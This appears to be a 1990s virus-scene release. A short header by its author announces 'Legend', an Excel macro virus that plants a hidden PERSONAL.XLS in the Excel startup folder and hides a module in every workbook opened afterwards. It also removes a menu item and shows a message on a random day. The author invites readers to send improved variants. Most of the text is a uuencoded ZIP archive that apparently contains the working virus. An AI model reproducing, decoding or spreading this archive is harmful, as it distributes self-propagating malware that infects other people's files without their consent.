EXCELMACRO.LEGEND
~~~~~~~~~~~~~~~~~

HERE IT IS! MY BRAND NEW EXCEL MACRO VIRUS COMPATIBLE WITH VERSIONS OF EXCEL
5 AND ABOVE. UPON SYSTEM INFECTION THE VIRUS CREATES A HIDDEN WORKBOOK CALLED
"PERSONAL.XLS" IN THE EXCEL STARTUP DIRECTORY. FROM THEN ON ANY WORKBOOK OPENED
HAS A HIDDEN MODULE INSERTED INTO IT CALLED "LEGEND". THE VIRUS HAS 2 MAIN
(HARMLESS) PAYLOADS: A MESSAGE IS DISPLAYED ON A RANDOM DAY AND THE TOOLSMACRO
MENU ITEM IS REMOVED. IF YOU THINK YOU CAN IMPROVE ON THIS VIRUS IN ANY WAY
THEN PLEASE SEND ME ANY MODIFIED VARIENTS THAT YOU OR ANYBODY ELSE YOU KNOW
PRODUCES. IF YOU FIND BUGS IN THIS VIRUS, WANT TO KNOW HOW TO HOOK MENU
COMMANDS OR NEED A LIST OF MORE PAYLOADS THEN ALL YOU HAVE TO DO IS MAIL ME.

VBB OWNS THIS VIRUS AND ANY VARIENT PRODUCED BUT HOLDS NO RESPONSIBILITY FOR
ANY DAMAGE CAUSED! PYRO PRODUCTIONS 1997.

PYRO <PYRO@ILF.NET>

================================CUT HERE=====================================
begin 644 LEGEND.ZIP
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
MF@P````T```*````````````(````#\#``!,14=%3D0N6$Q34$L%!@`````#
C``,`J0````$0```6`%!94D\@4%)/1%5#5$E/3E,@,3DY-RX`
`
end
